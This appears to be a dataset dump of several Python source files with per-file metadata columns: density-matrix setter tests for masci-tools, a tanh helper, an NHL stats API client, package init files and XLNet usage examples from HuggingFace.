| 0
| 0
| 0.142857
| 28
| 1
| 28
| 28
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0f5eea7ca771ac8bab3f2ab4c78f714832a33174
| 6,889
|
py
|
Python
|
tests/xml/test_xml_setters_nmmpmat.py
|
JuDFTteam/masci-tools
|
f08f004bf9db99b687a3c67d6c82e628a9231634
|
[
"MIT"
] | 15
|
2018-11-07T10:04:46.000Z
|
2021-11-08T20:51:08.000Z
|
tests/xml/test_xml_setters_nmmpmat.py
|
JuDFTteam/masci-tools
|
f08f004bf9db99b687a3c67d6c82e628a9231634
|
[
"MIT"
] | 120
|
2020-02-04T15:37:42.000Z
|
2022-03-17T10:49:40.000Z
|
tests/xml/test_xml_setters_nmmpmat.py
|
JuDFTteam/masci-tools
|
f08f004bf9db99b687a3c67d6c82e628a9231634
|
[
"MIT"
] | 11
|
2018-10-18T08:09:07.000Z
|
2022-02-22T15:45:21.000Z
|
# -*- coding: utf-8 -*-
"""Contains tests for the set_nmmpmat routine used for modifying the
density matrix for LDA+U calculations."""
import os
import pytest
import numpy as np
TEST_INPXML_LDAU_PATH = 'fleur/Max-R5/GaAsMultiUForceXML/files/inp.xml'
TEST_NMMPMAT_PATH = 'fleur/input_nmmpmat.txt'
def test_set_nmmpmat_nofile(load_inpxml, file_regression):
"""Test setting of nmmpmat with no initial nmmpmat file given"""
from masci_tools.util.xml.xml_setters_nmmpmat import set_nmmpmat
xmltree, schema_dict = load_inpxml(TEST_INPXML_LDAU_PATH, absolute=False)
nmmp_lines = None
nmmp_lines = set_nmmpmat(xmltree,
nmmp_lines,
schema_dict,
species_name='Ga-1',
orbital=2,
spin=1,
state_occupations=[1, 2, 3, 4, 5])
nmmp_lines = set_nmmpmat(xmltree,
nmmp_lines,
schema_dict,
'As-2',
orbital=1,
spin=1,
denmat=[[1, -2, 3], [4, -5, 6], [7, -8, 9]])
file_regression.check(prepare_for_file_dump(nmmp_lines))
def test_set_nmmpmat_file(load_inpxml, file_regression, test_file):
"""Test setting of nmmpmat with initial nmmpmat file given"""
from masci_tools.util.xml.xml_setters_nmmpmat import set_nmmpmat
xmltree, schema_dict = load_inpxml(TEST_INPXML_LDAU_PATH, absolute=False)
with open(test_file(TEST_NMMPMAT_PATH), mode='r', encoding='utf-8') as nmmpfile:
nmmp_lines = nmmpfile.read().split('\n')
nmmp_lines = set_nmmpmat(xmltree,
nmmp_lines,
schema_dict,
species_name='Ga-1',
orbital=2,
spin=1,
state_occupations=[1, 2, 3, 4, 5])
nmmp_lines = set_nmmpmat(xmltree,
nmmp_lines,
schema_dict,
'As-2',
orbital=1,
spin=1,
denmat=[[1, -2, 3], [4, -5, 6], [7, -8, 9]])
file_regression.check(prepare_for_file_dump(nmmp_lines))
def test_set_nmmpmat_file_get_wigner_matrix(load_inpxml, file_regression):
"""Test get_wigner_matrix by calling set_nmmpmat_file with theta, or phi != None"""
from masci_tools.util.xml.xml_setters_nmmpmat import set_nmmpmat
xmltree, schema_dict = load_inpxml(TEST_INPXML_LDAU_PATH, absolute=False)
nmmp_lines = None
nmmp_lines = set_nmmpmat(xmltree,
nmmp_lines,
schema_dict,
species_name='Ga-1',
orbital=1,
spin=1,
state_occupations=[1, 0, 1],
theta=np.pi / 2.0)
nmmp_lines = set_nmmpmat(xmltree,
nmmp_lines,
schema_dict,
'As-2',
orbital=1,
spin=1,
denmat=[[1, 0, 1], [0, 0, 0], [1, 0, 1]],
phi=np.pi / 4.0,
theta=np.pi / 2.0)
file_regression.check(prepare_for_file_dump(nmmp_lines))
def test_rotate_nmmpmat(load_inpxml, file_regression):
"""Test get_wigner_matrix by calling set_nmmpmat_file with theta, or phi != None"""
from masci_tools.util.xml.xml_setters_nmmpmat import set_nmmpmat, rotate_nmmpmat
xmltree, schema_dict = load_inpxml(TEST_INPXML_LDAU_PATH, absolute=False)
nmmp_lines = None
nmmp_lines = set_nmmpmat(xmltree,
nmmp_lines,
schema_dict,
species_name='Ga-1',
orbital=1,
spin=1,
state_occupations=[1, 0, 1])
nmmp_lines = set_nmmpmat(xmltree,
nmmp_lines,
schema_dict,
'As-2',
orbital=1,
spin=1,
denmat=[[1, 0, 1], [0, 0, 0], [1, 0, 1]])
nmmp_lines = rotate_nmmpmat(xmltree, nmmp_lines, schema_dict, 'Ga-1', orbital=1, phi=0.0, theta=np.pi / 2.0)
nmmp_lines = rotate_nmmpmat(xmltree, nmmp_lines, schema_dict, 'As-2', orbital=1, theta=np.pi / 2.0, phi=np.pi / 4.0)
file_regression.check(prepare_for_file_dump(nmmp_lines))
def test_validate_nmmpmat(load_inpxml, test_file):
"""Test validation method of nmmpmat file together with inp.xml file"""
from masci_tools.util.xml.xml_setters_nmmpmat import set_nmmpmat, validate_nmmpmat
xmltree, schema_dict = load_inpxml(TEST_INPXML_LDAU_PATH, absolute=False)
with open(test_file(TEST_NMMPMAT_PATH), mode='r', encoding='utf-8') as nmmpfile:
nmmp_lines_orig = nmmpfile.read().split('\n')
validate_nmmpmat(xmltree, nmmp_lines_orig, schema_dict) #should not raise
#Test number of lines error
nmmp_lines = nmmp_lines_orig.copy()
nmmp_lines.append('0.0')
with pytest.raises(ValueError):
validate_nmmpmat(xmltree, nmmp_lines, schema_dict)
nmmp_lines.remove('0.0')
#Test invalid diagonal element error
nmmp_lines = nmmp_lines_orig.copy()
nmmp_lines = set_nmmpmat(xmltree,
nmmp_lines,
schema_dict,
species_name='Ga-1',
orbital=2,
spin=1,
state_occupations=[1, 2, 3, 4, 5])
nmmp_lines = set_nmmpmat(xmltree,
nmmp_lines,
schema_dict,
'As-2',
orbital=1,
spin=1,
denmat=[[1, -2, 3], [4, -5, 6], [7, -8, 9]])
with pytest.raises(ValueError):
validate_nmmpmat(xmltree, nmmp_lines, schema_dict)
#Test invalid outsied value error
nmmp_lines = nmmp_lines_orig.copy()
nmmp_lines[
0] = ' 0.0000000000000 9.0000000000000 0.0000000000000 0.0000000000000 0.0000000000000 0.0000000000000 0.0000000000000'
with pytest.raises(ValueError):
validate_nmmpmat(xmltree, nmmp_lines, schema_dict)
def prepare_for_file_dump(file_lines):
"""
Join lines together with linebreaks and remove negative zeros
"""
return '\n'.join([line.replace('-0.0000000000000', ' 0.0000000000000') for line in file_lines])
| 40.28655
| 155
| 0.532879
| 786
| 6,889
| 4.40458
| 0.161578
| 0.119584
| 0.083189
| 0.106297
| 0.790872
| 0.748411
| 0.741768
| 0.735413
| 0.735413
| 0.661179
| 0
| 0.05792
| 0.375962
| 6,889
| 170
| 156
| 40.523529
| 0.747383
| 0.092176
| 0
| 0.770492
| 0
| 0.008197
| 0.050314
| 0.010966
| 0
| 0
| 0
| 0
| 0
| 1
| 0.04918
| false
| 0
| 0.065574
| 0
| 0.122951
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7e36adf1af859b2c2c7ede693423d0938adbd3d9
| 108
|
py
|
Python
|
pymul/functions/activation.py
|
mathletedev/pymul
|
f97ac499ceb45755e464445b949d1433fa74f0c3
|
[
"Apache-2.0"
] | 1
|
2021-04-01T23:47:11.000Z
|
2021-04-01T23:47:11.000Z
|
pymul/functions/activation.py
|
mathletedev/pymul
|
f97ac499ceb45755e464445b949d1433fa74f0c3
|
[
"Apache-2.0"
] | null | null | null |
pymul/functions/activation.py
|
mathletedev/pymul
|
f97ac499ceb45755e464445b949d1433fa74f0c3
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
def tanh(x):
return np.tanh(x)
def tanh_prime(x):
return 1 - np.tanh(x) ** 2
| 10.8
| 30
| 0.601852
| 21
| 108
| 3.047619
| 0.52381
| 0.234375
| 0.21875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.025
| 0.259259
| 108
| 9
| 31
| 12
| 0.775
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| false
| 0
| 0.2
| 0.4
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 6
|
7e4b4ba555c4af2552b078a3c0f89ea741aa9aac
| 8,584
|
py
|
Python
|
easy_nhl/player.py
|
branks42/easy-nhl
|
cfdfb1434b9cbdd9c71f5aee9cfb255c92c11804
|
[
"MIT"
] | 1
|
2021-04-26T23:59:14.000Z
|
2021-04-26T23:59:14.000Z
|
easy_nhl/player.py
|
branks42/easy-nhl
|
cfdfb1434b9cbdd9c71f5aee9cfb255c92c11804
|
[
"MIT"
] | null | null | null |
easy_nhl/player.py
|
branks42/easy-nhl
|
cfdfb1434b9cbdd9c71f5aee9cfb255c92c11804
|
[
"MIT"
] | null | null | null |
import requests
from .base_url import base_url
class Player():
"""
Player endpoints of the NHL API.
"""
def __init__(self, player_id):
self.player_id = player_id
self.player_url = f"{base_url}/api/v1/people"
def player_info(self):
"""
Get player information.
"""
response = requests.get(f"{self.player_url}/{self.player_id}")
if response.status_code != 200:
return {"error": f"Player with ID '{self.player_id}' not found."}
if "fullName" not in response.json()['people'][0]:
return {"error": f"Player with ID '{self.player_id}' not found."}
return response.json()['people'][0]
def season_stats(self, season=None):
"""
Get a player's stats from the provided season
Args:
season (str, optional): Defaults to current season, must be 2 consecutive years with no spaces.
"""
if season:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=statsSingleSeason&season={season}")
else:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=statsSingleSeason")
if response.status_code != 200:
return {"error": f"Player with ID '{self.player_id}' not found."}
return response.json()['stats'][0]['splits']
def goals_by_game_situation(self, season=None):
"""
Get goals of a given player with details of the game situation in which they were scored.
Args:
season [str]: Defaults to current season, must be 2 consecutive years with no spaces.
"""
if season:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=goalsByGameSituation&season={season}")
else:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=goalsByGameSituation")
if response.status_code != 200:
return {"error": f"Player with ID '{self.player_id}' not found."}
return response.json()['stats'][0]['splits']
def win_loss_record(self, season=None):
"""
Get a goalies win loss record for a current season
Args:
season [str]: Defaults to current season, must be 2 consecutive years with no spaces.
"""
if season:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=winLoss&season={season}")
else:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=winLoss")
if response.status_code != 200:
return {"error": f"Player with ID '{self.player_id}' not found."}
return response.json()['stats'][0]['splits']
def home_away_stats(self, season=None):
"""
Get a players stats broken up by home and away games.
Args:
season [str]: Defaults to current season, must be 2 consecutive years with no spaces.
"""
if season:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=homeAndAway&season={season}")
else:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=homeAndAway")
if response.status_code != 200:
return {"error": f"Player with ID '{self.player_id}' not found."}
return response.json()['stats'][0]['splits']
def stats_split_by_month(self, season=None):
"""
Get a players stats broken up by month.
Args:
season [str]: Defaults to current season, must be 2 consecutive years with no spaces.
"""
if season:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=byMonth&season={season}")
else:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=byMonth")
if response.status_code != 200:
return {"error": f"Player with ID '{self.player_id}' not found."}
return response.json()['stats'][0]['splits']
def stats_split_by_day_of_week(self, season=None):
"""
Get a players stats broken up by day of the week.
Args:
season [str]: Defaults to current season, must be 2 consecutive years with no spaces.
"""
if season:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=byDayOfWeek&season={season}")
else:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=byDayOfWeek")
if response.status_code != 200:
return {"error": f"Player with ID '{self.player_id}' not found."}
return response.json()['stats'][0]['splits']
def stats_split_by_division(self, season=None):
"""
Get a players stats broken up by division.
Args:
season [str]: Defaults to current season, must be 2 consecutive years with no spaces.
"""
if season:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=vsDivision&season={season}")
else:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=vsDivision")
if response.status_code != 200:
return {"error": f"Player with ID '{self.player_id}' not found."}
return response.json()['stats'][0]['splits']
def stats_split_by_conference(self, season=None):
"""
Get a players stats broken up by conference.
Args:
season [str]: Defaults to current season, must be 2 consecutive years with no spaces.
"""
if season:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=vsConference&season={season}")
else:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=vsConference")
if response.status_code != 200:
return {"error": f"Player with ID '{self.player_id}' not found."}
return response.json()['stats'][0]['splits']
def stats_split_by_team(self, season=None):
"""
Get a players stats broken up by team.
Args:
season [str]: Defaults to current season, must be 2 consecutive years with no spaces.
"""
if season:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=vsTeam&season={season}")
else:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=vsTeam")
if response.status_code != 200:
return {"error": f"Player with ID '{self.player_id}' not found."}
return response.json()['stats'][0]['splits']
def stats_split_by_game(self, season=None):
"""
Get a players stats broken up by game.
Args:
season [str]: Defaults to current season, must be 2 consecutive years with no spaces.
"""
if season:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=gameLog&season={season}")
else:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=gameLog")
if response.status_code != 200:
return {"error": f"Player with ID '{self.player_id}' not found."}
return response.json()['stats'][0]['splits']
def stats_standings(self, season=None):
"""
Get a players stats standings.
Args:
season [str]: Defaults to current season, must be 2 consecutive years with no spaces.
"""
if season:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=regularSeasonStatRankings&season={season}")
else:
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=regularSeasonStatRankings")
if response.status_code != 200:
return {"error": f"Player with ID '{self.player_id}' not found."}
return response.json()['stats'][0]['splits']
def stats_on_pace_for(self):
"""
Get a players projected stats.
Args:
season [str]: Defaults to current season, must be 2 consecutive years with no spaces.
"""
response = requests.get(f"{self.player_url}/{self.player_id}/stats?stats=onPaceRegularSeason")
if response.status_code != 200:
return {"error": f"Player with ID '{self.player_id}' not found."}
return response.json()['stats'][0]['splits']
| 37.814978
| 128
| 0.604264
| 1,089
| 8,584
| 4.653811
| 0.093664
| 0.128256
| 0.094712
| 0.094712
| 0.876677
| 0.873125
| 0.867601
| 0.861681
| 0.861681
| 0.861681
| 0
| 0.010485
| 0.266659
| 8,584
| 226
| 129
| 37.982301
| 0.794599
| 0.208411
| 0
| 0.575472
| 0
| 0
| 0.387723
| 0.254453
| 0
| 0
| 0
| 0
| 0
| 1
| 0.132075
| false
| 0
| 0.018868
| 0
| 0.415094
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
7e859e4f5e0ebbcaceb5318c2ee2db4bb1676fa7
| 150
|
py
|
Python
|
UI/__init__.py
|
SiriYXR/IstaTranslator
|
e3339aa764990f7dbf69796feb609fff3c5f8612
|
[
"Apache-2.0"
] | 6
|
2021-02-13T12:21:56.000Z
|
2022-01-12T08:43:52.000Z
|
UI/__init__.py
|
SiriYXR/IstaTranslator
|
e3339aa764990f7dbf69796feb609fff3c5f8612
|
[
"Apache-2.0"
] | null | null | null |
UI/__init__.py
|
SiriYXR/IstaTranslator
|
e3339aa764990f7dbf69796feb609fff3c5f8612
|
[
"Apache-2.0"
] | 3
|
2021-03-24T13:48:09.000Z
|
2021-08-25T02:33:33.000Z
|
# -*- coding:utf-8 -*-
"""
@author: SiriYang
@file: __init__.py
@createTime: 2021-01-22 16:12:10
@updateTime: 2021-01-22 16:12:10
@codeLines: 0
"""
| 13.636364
| 32
| 0.64
| 24
| 150
| 3.833333
| 0.75
| 0.130435
| 0.173913
| 0.217391
| 0.304348
| 0.304348
| 0
| 0
| 0
| 0
| 0
| 0.230769
| 0.133333
| 150
| 10
| 33
| 15
| 0.476923
| 0.92
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0e1d0db87267c9bd987a8c86b6a445844425b983
| 218
|
py
|
Python
|
broccoli_server/mod_view/__init__.py
|
KTachibanaM/broccoli-platform
|
31d3ee4246a3c035ed3d1ce8657fa7d4567c3092
|
[
"Apache-2.0"
] | 3
|
2020-12-20T13:14:34.000Z
|
2022-02-12T11:07:38.000Z
|
broccoli_server/mod_view/__init__.py
|
KTachibanaM/broccoli-platform
|
31d3ee4246a3c035ed3d1ce8657fa7d4567c3092
|
[
"Apache-2.0"
] | 50
|
2020-06-05T22:55:49.000Z
|
2022-03-18T05:15:29.000Z
|
broccoli_server/mod_view/__init__.py
|
k-t-corp/broccoli-server
|
16f3966e8391326a5cd5125bb0d5c7306f9e1490
|
[
"Apache-2.0"
] | null | null | null |
from .mod_view_query import ModViewColumn
from .mod_view_query import ModViewQuery
from .mod_view_query import NamedModViewColumn
from .mod_view_renderer import ModViewRenderer
from .mod_view_store import ModViewStore
| 36.333333
| 46
| 0.885321
| 30
| 218
| 6.1
| 0.4
| 0.191257
| 0.300546
| 0.262295
| 0.360656
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.091743
| 218
| 5
| 47
| 43.6
| 0.924242
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0e87e5946a4df09bfa605d3b8accaf343dd9b9e5
| 67
|
py
|
Python
|
suzu.py
|
takaakiaoki/suzu
|
431975a5345d9683f0a9453275764693e9e2064e
|
[
"MIT"
] | 6
|
2018-05-05T10:13:11.000Z
|
2021-06-21T02:11:44.000Z
|
suzu.py
|
takaakiaoki/suzu
|
431975a5345d9683f0a9453275764693e9e2064e
|
[
"MIT"
] | null | null | null |
suzu.py
|
takaakiaoki/suzu
|
431975a5345d9683f0a9453275764693e9e2064e
|
[
"MIT"
] | 5
|
2018-05-05T10:13:56.000Z
|
2020-06-15T14:32:45.000Z
|
#!/usr/bin/env python
import suzu
import suzu.run
suzu.run.run()
| 9.571429
| 21
| 0.716418
| 12
| 67
| 4
| 0.583333
| 0.416667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134328
| 67
| 6
| 22
| 11.166667
| 0.827586
| 0.298507
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7ecb632ad8edf7cbcb8536a68c49ca9bfee3053e
| 35
|
py
|
Python
|
dangie/homepage/__init__.py
|
Aunsiels/dangie
|
7cc13bbae57987c2fce28c411994634bb704cf4a
|
[
"MIT"
] | null | null | null |
dangie/homepage/__init__.py
|
Aunsiels/dangie
|
7cc13bbae57987c2fce28c411994634bb704cf4a
|
[
"MIT"
] | null | null | null |
dangie/homepage/__init__.py
|
Aunsiels/dangie
|
7cc13bbae57987c2fce28c411994634bb704cf4a
|
[
"MIT"
] | null | null | null |
from dangie.homepage import routes
| 17.5
| 34
| 0.857143
| 5
| 35
| 6
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 35
| 1
| 35
| 35
| 0.967742
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
7ee1db4953f07c0280172160197aa1d70f4bb626
| 4,016
|
py
|
Python
|
intermediate_source/hugging_face/xlnet_test.py
|
jianyiyang5/tutorials
|
4125b852c3baed58359aa760d74534b259f8d9ea
|
[
"BSD-3-Clause"
] | null | null | null |
intermediate_source/hugging_face/xlnet_test.py
|
jianyiyang5/tutorials
|
4125b852c3baed58359aa760d74534b259f8d9ea
|
[
"BSD-3-Clause"
] | null | null | null |
intermediate_source/hugging_face/xlnet_test.py
|
jianyiyang5/tutorials
|
4125b852c3baed58359aa760d74534b259f8d9ea
|
[
"BSD-3-Clause"
] | null | null | null |
from transformers import XLNetTokenizer, XLNetModel
import torch
tokenizer = XLNetTokenizer.from_pretrained('xlnet-large-cased')
model = XLNetModel.from_pretrained('xlnet-large-cased')
input_ids = torch.tensor(tokenizer.encode("Hello, my dog is cute", add_special_tokens=False)).unsqueeze(0) # Batch size 1
outputs = model(input_ids)
last_hidden_states = outputs[0] # The last hidden-state is the first element of the output tuple
print(last_hidden_states[0].size())
# from transformers import XLNetTokenizer, XLNetLMHeadModel
# import torch
#
# tokenizer = XLNetTokenizer.from_pretrained('xlnet-large-cased')
# model = XLNetLMHeadModel.from_pretrained('xlnet-large-cased')
# # We show how to setup inputs to predict a next token using a bi-directional context.
# input_ids = torch.tensor(tokenizer.encode("Hello, my dog is very <mask>", add_special_tokens=False)).unsqueeze(0) # We will predict the masked token
# perm_mask = torch.zeros((1, input_ids.shape[1], input_ids.shape[1]), dtype=torch.float)
# perm_mask[:, :, -1] = 1.0 # Previous tokens don't see last token
# target_mapping = torch.zeros((1, 1, input_ids.shape[1]), dtype=torch.float) # Shape [1, 1, seq_length] => let's predict one token
# target_mapping[0, 0, -1] = 1.0 # Our first (and only) prediction will be the last token of the sequence (the masked token)
#
# outputs = model(input_ids, perm_mask=perm_mask, target_mapping=target_mapping)
# next_token_logits = outputs[0] # Output has shape [target_mapping.size(0), target_mapping.size(1), config.vocab_size]
# print(next_token_logits.size())
# predicted_index = torch.argmax(next_token_logits[0, -1, :])
# print(predicted_index)
# print(tokenizer.decode([predicted_index.item()]))
from transformers import XLNetTokenizer, XLNetLMHeadModel
import torch
tokenizer = XLNetTokenizer.from_pretrained('xlnet-large-cased')
model = XLNetLMHeadModel.from_pretrained('xlnet-large-cased')
# We show how to setup inputs to predict a next token using a bi-directional context.
input_ids = torch.tensor(tokenizer.encode("Hello, my dog is very <mask>", add_special_tokens=False)).unsqueeze(0) # We will predict the masked token
perm_mask = torch.zeros((1, input_ids.shape[1], input_ids.shape[1]), dtype=torch.float)
perm_mask[:, :, -1] = 1.0 # Previous tokens don't see last token
target_mapping = torch.zeros((1, 1, input_ids.shape[1]), dtype=torch.float) # Shape [1, 1, seq_length] => let's predict one token
target_mapping[0, 0, -1] = 1.0 # Our first (and only) prediction will be the last token of the sequence (the masked token)
outputs = model(input_ids, perm_mask=perm_mask, target_mapping=target_mapping)
next_token_logits = outputs[0] # Output has shape [target_mapping.size(0), target_mapping.size(1), config.vocab_size]
# The same way can the XLNetLMHeadModel be used to be trained by standard auto-regressive language modeling.
input_ids = torch.tensor(tokenizer.encode("Hello, my dog is very <mask>", add_special_tokens=False)).unsqueeze(0) # We will predict the masked token
labels = torch.tensor(tokenizer.encode("cute", add_special_tokens=False)).unsqueeze(0)
assert labels.shape[0] == 1, 'only one word will be predicted'
perm_mask = torch.zeros((1, input_ids.shape[1], input_ids.shape[1]), dtype=torch.float)
perm_mask[:, :, -1] = 1.0 # Previous tokens don't see last token as is done in standard auto-regressive lm training
target_mapping = torch.zeros((1, 1, input_ids.shape[1]), dtype=torch.float) # Shape [1, 1, seq_length] => let's predict one token
target_mapping[0, 0, -1] = 1.0 # Our first (and only) prediction will be the last token of the sequence (the masked token)
outputs = model(input_ids, perm_mask=perm_mask, target_mapping=target_mapping, labels=labels)
loss, next_token_logits = outputs[:2] # Output has shape [target_mapping.size(0), target_mapping.size(1), config.vocab_size]
print(next_token_logits.size())
predicted_index = torch.argmax(next_token_logits[0, -1, :])
print(predicted_index)
print(tokenizer.decode([predicted_index.item()]))
| 61.784615
| 151
| 0.760209
| 627
| 4,016
| 4.720893
| 0.180223
| 0.079054
| 0.027365
| 0.042568
| 0.853378
| 0.843581
| 0.843581
| 0.819932
| 0.819932
| 0.819932
| 0
| 0.020006
| 0.116285
| 4,016
| 65
| 152
| 61.784615
| 0.814032
| 0.525398
| 0
| 0.4375
| 0
| 0
| 0.09636
| 0
| 0
| 0
| 0
| 0
| 0.03125
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0.125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ada32f600da70ae7fe7ed7f4da269102ea1b1951
| 58
|
py
|
Python
|
femb/evaluation/__init__.py
|
jonasgrebe/pt-femb-face-embeddings
|
8f055a59293d75ad60d4b0a92f86ee6f3f07e950
|
[
"MIT"
] | 16
|
2021-04-16T14:57:08.000Z
|
2022-02-23T08:09:39.000Z
|
femb/evaluation/__init__.py
|
jonasgrebe/pt-femb-face-embeddings
|
8f055a59293d75ad60d4b0a92f86ee6f3f07e950
|
[
"MIT"
] | 1
|
2022-01-05T14:10:16.000Z
|
2022-01-06T08:13:13.000Z
|
femb/evaluation/__init__.py
|
jonasgrebe/pt-femb-face-embeddings
|
8f055a59293d75ad60d4b0a92f86ee6f3f07e950
|
[
"MIT"
] | 3
|
2021-04-16T13:41:25.000Z
|
2022-02-23T08:09:42.000Z
|
from .verification_evaluator import VerificationEvaluator
| 29
| 57
| 0.913793
| 5
| 58
| 10.4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068966
| 58
| 1
| 58
| 58
| 0.962963
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
adfaa7792d6dd55af5aa9d52200fb0791b4414ad
| 114
|
py
|
Python
|
atss4po/api_v1/__init__.py
|
kaiueo/atss4po
|
56248339bcb50779e386e25ac04202e2df8b5e10
|
[
"BSD-3-Clause"
] | null | null | null |
atss4po/api_v1/__init__.py
|
kaiueo/atss4po
|
56248339bcb50779e386e25ac04202e2df8b5e10
|
[
"BSD-3-Clause"
] | null | null | null |
atss4po/api_v1/__init__.py
|
kaiueo/atss4po
|
56248339bcb50779e386e25ac04202e2df8b5e10
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
from . import auth # noqa
from . import summary
from . import article
from . import utils
| 22.8
| 26
| 0.675439
| 16
| 114
| 4.8125
| 0.625
| 0.519481
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010989
| 0.201754
| 114
| 5
| 27
| 22.8
| 0.835165
| 0.22807
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
